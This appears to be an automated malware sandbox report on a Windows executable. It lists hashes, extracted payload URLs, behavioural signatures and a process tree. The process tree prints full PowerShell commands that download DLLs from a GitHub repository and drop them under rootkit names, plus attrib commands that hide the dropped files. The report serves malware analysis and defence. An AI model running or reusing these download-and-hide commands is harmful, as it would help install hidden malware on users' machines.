Analysis
-
max time kernel
149s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
22-01-2024 08:16
Behavioral task
behavioral1
Sample
6f2bf69913f6bf47a6ae722c9640a311.exe
Resource
win7-20231129-en
General
-
Target
6f2bf69913f6bf47a6ae722c9640a311.exe
-
Size
46KB
-
MD5
6f2bf69913f6bf47a6ae722c9640a311
-
SHA1
5aa0c1acc2c56f283a9694f4953f6085f0b0059d
-
SHA256
8920797352a55d0413ab4642e7e2dcd049d702678f6870f6f58ac64e814e5720
-
SHA512
0721b0c5ad0ce0049609da9f59359fb5d895005342f87697683c9ffbb63213b125c8c81f55dfef50b7678b0f52ad3707d8c4cbdfadb64b8136f236bb3a30164c
-
SSDEEP
768:MB9QFE9xTu53yAeC1lNhTTHxAlbL0gUqrvs9kIL4:MBN9A5CAeCRpTHMbL0gU6+ka4
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC86.dll
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 5 2140 powershell.exe 6 2140 powershell.exe 8 2468 powershell.exe 9 2468 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exe6f2bf69913f6bf47a6ae722c9640a311.exepid process 2140 powershell.exe 2468 powershell.exe 2344 6f2bf69913f6bf47a6ae722c9640a311.exe 2344 6f2bf69913f6bf47a6ae722c9640a311.exe 2344 6f2bf69913f6bf47a6ae722c9640a311.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exe6f2bf69913f6bf47a6ae722c9640a311.exedescription pid process Token: SeDebugPrivilege 2140 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2344 6f2bf69913f6bf47a6ae722c9640a311.exe Token: 33 2344 6f2bf69913f6bf47a6ae722c9640a311.exe Token: SeIncBasePriorityPrivilege 2344 6f2bf69913f6bf47a6ae722c9640a311.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
6f2bf69913f6bf47a6ae722c9640a311.execmd.execmd.exedescription pid process target process PID 2344 wrote to memory of 3060 2344 6f2bf69913f6bf47a6ae722c9640a311.exe cmd.exe PID 2344 wrote to memory of 3060 2344 6f2bf69913f6bf47a6ae722c9640a311.exe cmd.exe PID 2344 wrote to memory of 3060 2344 6f2bf69913f6bf47a6ae722c9640a311.exe cmd.exe PID 3060 wrote to memory of 2140 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 2140 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 2140 3060 cmd.exe powershell.exe PID 2344 wrote to memory of 2564 2344 6f2bf69913f6bf47a6ae722c9640a311.exe cmd.exe PID 2344 wrote to memory of 2564 2344 6f2bf69913f6bf47a6ae722c9640a311.exe cmd.exe PID 2344 wrote to memory of 2564 2344 6f2bf69913f6bf47a6ae722c9640a311.exe cmd.exe PID 2564 wrote to memory of 2468 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 2468 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 2468 2564 cmd.exe powershell.exe PID 2344 wrote to memory of 1908 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1908 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1908 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 2516 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 2516 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 2516 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 2828 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 2828 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 2828 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1676 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1676 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1676 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1468 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1468 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe PID 2344 wrote to memory of 1468 2344 6f2bf69913f6bf47a6ae722c9640a311.exe attrib.exe -
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1676 attrib.exe 2828 attrib.exe 2516 attrib.exe 1908 attrib.exe 1468 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6f2bf69913f6bf47a6ae722c9640a311.exe"C:\Users\Admin\AppData\Local\Temp\6f2bf69913f6bf47a6ae722c9640a311.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\D64.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3060
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\D86.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2564
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\Subdir"2⤵
- Views/modifies file attributes
PID:1908
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\r77-x64.dll"2⤵
- Views/modifies file attributes
PID:1468
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\cjc3LXg4Ni5kbGw="2⤵
- Views/modifies file attributes
PID:1676
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Local\"2⤵
- Views/modifies file attributes
PID:2828
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s "C:\Users\Admin\AppData\Roaming\Subdir\$77-google.exe"2⤵
- Views/modifies file attributes
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\Users\Admin\AppData\Local\Temp\r77-x64.dll');1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC86.dll','C:\Users\Admin\AppData\Local\Temp\r77-x86.dll');1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
222B
MD59c2599eecfb45356c99a7320805d85e7
SHA1ebbe61d1cf2d55c3d7c59fbaa1a2ba62b0f244e7
SHA256a3f1a82cc9957b71b5409c6280e97e8af14bdc3c6fb5ad195708f8c95a6f4d40
SHA512b8d32363da98d418f9caf853b1569a0b4051e2475067988f3cdbaf2226ba667d4dd1e69217e10860cb6a947b894093878a1fad6525aebb9c353e9e956a86c8a4
-
Filesize
222B
MD5d35427fb987daec1ccf0b500929c0bd0
SHA1f56c9b7e7ce037aa9cb3a513cb2d7ad317ab6447
SHA256f818bbd6afa5d80f4b2d8c2d090a2a487d3cd69ffd32214a169d62282b7cb861
SHA51273b489ab1372bc5cbf2248cf706041e73532daeebcf448d1720b485e7a5e7614afc9ebd6ea407adf3bd7006a61cef008241385bb1e060b3e4d33f8ca4b89f830
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f2ff374e5184d81999a918ebf9e7750f
SHA14cb2467b455da3bd4412b72a4be63e00d365a3ef
SHA2567a3e987946a7032bb89b2aabb0062f04d833adb30ac387eaf149f861fef02bd5
SHA512005d962a1ad3e83533ad0dbaf5855d6aa3bdc580a712e35c560df79075c836acad62a3b0a08bdba1876a09dae8d59e8d78c6d32cc6fa4cfc0d973e1f662876a3